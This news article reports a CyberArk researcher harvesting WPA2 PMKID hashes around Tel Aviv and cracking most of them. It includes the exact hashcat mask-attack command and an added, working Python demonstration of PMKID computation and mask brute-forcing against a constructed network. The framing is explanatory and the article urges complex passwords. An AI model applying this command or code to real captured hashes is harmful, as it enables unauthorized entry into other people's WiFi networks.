
Security researcher harvests 5,000 encrypted WiFi passwords, cracks 70%

2,200 passwords cracked with a single HashCat command

A security researcher at CyberArk strolling the streets of Tel Aviv with a $50 network card and associated WiFi sniffing kit harvested 5,000 hashed WiFi network passwords (WPA2 PMKID hashes), then cracked 70% of them using the password-recovery tool hashcat -- running on an admittedly beefy rig (eight NVIDIA Quadro RTX 8000 graphics cards, worth about £30,000) in the security firm's offices -- in an attack that flags anew the risks around poor WiFi security.

As Ido Hoorvitch noted in a detailed blog on the hugely successful WiFi hacking project on October 26: "With the continued shift to remote work due to the pandemic, securing home networks has become imperative and poses a risk to the enterprise if not done so. Home networks rarely have the same controls as enterprise networks. And a security program is only as strong as its weakest link." (Among the companies hit via a penetration that started at router level recently is T-Mobile...)

"Concerning the enterprise", Hoorvitch added, "it’s possible for an attacker to gain initial access to a remote user’s WiFi and then hop to the user’s computer and wait for a VPN connection or for the user to go to the office and move laterally from there."

He noted: "While this research was conducted in Tel Aviv, the routers that were susceptible to this attack — from many of the world’s largest vendors — are used by households and businesses worldwide."

Hilariously/worryingly, using a simple hashcat mask attack that tried every possible Israeli cellphone number (the prefix '05' followed by eight digits, a keyspace of just 10^8 candidates), he immediately cracked 2,200 passwords.

(Choose and use complex passwords, as ever, one and all...)

sudo hashcat -a 3 -w4 -m 22000 /home/tuser/hashes/Wi-Fi_pmkid_hash_22000_file.txt 05?d?d?d?d?d?d?d?d -o /home/tuser/hashes/pmkid_cracked.txt
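To make the command above concrete, here is an added example (not code from the article or from CyberArk's research) that computes a WPA2 PMKID the way hashcat mode 22000 checks it, writes it out as a 22000-format hash line, and then runs a tiny hashcat-style mask attack against it. The SSID, MAC addresses and passphrase are constructed; the mask is deliberately narrowed from the article's 05?d?d?d?d?d?d?d?d so the search finishes in seconds on a CPU, while keyspace() shows why the full mask is a quick job for a GPU rig.

```python
"""Added example, not part of the original article: WPA2 PMKID computation,
hashcat 22000 line handling, and a small mask attack.  All network details
(SSID, MACs, passphrase) are constructed for illustration."""
import hashlib
import hmac
import itertools

# Subset of hashcat's built-in mask charsets
CHARSETS = {
    "d": "0123456789",
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
}


def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC) per IEEE 802.11."""
    data = b"PMK Name" + ap_mac + sta_mac
    return hmac.new(pmk(passphrase, ssid), data, "sha1").digest()[:16]


def hashcat_22000_pmkid_line(pmkid_hex: str, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Hashcat 22000 line for a PMKID (type 01); anonce/EAPOL/message-pair fields stay empty."""
    return f"WPA*01*{pmkid_hex}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.encode().hex()}***"


def parse_22000_line(line: str) -> dict:
    """Parse a WPA*01 (PMKID) line back into its components."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("only WPA*01 (PMKID) lines are handled here")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "ap_mac": bytes.fromhex(fields[3]),
        "sta_mac": bytes.fromhex(fields[4]),
        "ssid": bytes.fromhex(fields[5]).decode(),
    }


def mask_positions(mask: str) -> list:
    """Turn a hashcat mask such as '05?d?d' into one alphabet per position."""
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            # '??' is a literal question mark, '?d' etc. a charset
            positions.append("?" if mask[i + 1] == "?" else CHARSETS[mask[i + 1]])
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask: str) -> int:
    """Number of candidates the mask expands to (product of alphabet sizes)."""
    n = 1
    for alphabet in mask_positions(mask):
        n *= len(alphabet)
    return n


def candidates(mask: str):
    for combo in itertools.product(*mask_positions(mask)):
        yield "".join(combo)


def crack_pmkid(line: str, mask: str):
    """Brute-force a 22000 PMKID line with the given mask; return the passphrase or None."""
    h = parse_22000_line(line)
    for candidate in candidates(mask):
        if pmkid(candidate, h["ssid"], h["ap_mac"], h["sta_mac"]) == h["pmkid"]:
            return candidate
    return None


# Constructed "captured" network: passphrase is an Israeli-style mobile number.
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
SSID = "HomeNet-42"
SECRET_PASSPHRASE = "0512345678"  # constructed: '05' + 8 digits
HASHLINE = hashcat_22000_pmkid_line(
    pmkid(SECRET_PASSPHRASE, SSID, AP_MAC, STA_MAC).hex(), AP_MAC, STA_MAC, SSID
)

if __name__ == "__main__":
    print(HASHLINE)
    print("keyspace of 05?d?d?d?d?d?d?d?d:", keyspace("05?d?d?d?d?d?d?d?d"))
    # The full 10^8 keyspace is a GPU job; a narrowed mask keeps this runnable on a CPU.
    print("cracked:", crack_pmkid(HASHLINE, "05123456?d?d"))
```

The expensive step is the PBKDF2 in pmk(): 4096 rounds of HMAC-SHA1 per candidate, which is what the eight RTX 8000 cards were grinding through. The attack works because the keyspace, not the hash, is weak: ten digits with a fixed prefix is 10^8 candidates, whereas a ten-character random alphanumeric passphrase is over 10^17.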

Technical details, including how the PMKID hash is recovered from the RSN IE (Robust Security Network Information Element) of the first EAPOL frame (so no full four-way handshake, and no connected client, needs to be captured), together with a blow-by-blow account of the campaign, can be found here.

See also: From the Slack API to queued print jobs, hackers are getting esoteric with their C2 channels